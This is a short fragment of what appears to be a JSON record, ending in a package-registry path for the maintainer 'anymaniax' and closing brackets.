/maintainers/anymaniax/packages"}]}